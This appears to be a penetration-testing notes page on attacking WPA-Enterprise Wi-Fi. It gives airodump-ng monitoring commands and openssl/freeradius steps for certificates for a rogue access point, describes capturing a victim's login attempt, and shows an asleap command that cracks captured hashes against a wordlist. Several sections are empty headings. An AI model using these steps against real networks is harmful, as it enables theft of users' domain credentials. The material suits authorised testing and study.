WPA-Enterprise

WPA Enterprise enables user authentication against a central database. WPA Enterprise uses Extensible Authentication Protocol (EAP).

Monitor:

airodump-ng --band abg wlan0 # no channel
airodump-ng --channel 6 wlan0 #  with channel

Create Certs

openssl x509 -in CERT_FILENAME -noout -enddate 
openssl x509 -inform der -in CERTIFICATE_FILENAME -outform pem -out OUTPUT_PEM.crt

OR

sudo apt install freeradius

certs stored in "/etc/freeradius/3.0/certs"

cd /etc/freeradius/3.0/certs
make

Create certs:

Mkdir Tools/wireless/Certs 
cd Tools/wireless/Certs
openssl genrsa -out server.key 2048
openssl req -new -sha256 -key server.key -out csr.csr
openssl req -x509 -sha256 -days 365 -key server.key -in csr.csr -out server.pem
ln -s server.pem ca.pem
openssl dhparam 2048 > dhparam.pem

Create configuration:

Create user EAP file:

Deauth:

Capture:

When a victim attempts to authenticate to our AP, the login attempt is captured.

Crack captured creds:

asleap -C ce:b6:98:85:c6:56:59:0c -R 72:79:f6:5a:a4:98:70:f4:58:22:c8:9d:cb:dd:73:c1:b8:9d:37:78:44:ca:ea:d4 -W /usr/share/john/password.lst

Basic info:

Authentication is done using a Remote Authentication Dial-In User Service (RADIUS)2 server. The client authenticates using a number of EAP frames, depending on the agreed upon authentication scheme, which are relayed by the AP to the RADIUS server. If authentication is successful, the result is then used as Pairwise Master Key (PMK) for the 4-way handshake, as opposed to PSK, where the passphrase is derived to generate the PMK.

It is common to use a username and password to authenticate, which could be tied to domain credentials.

Last updated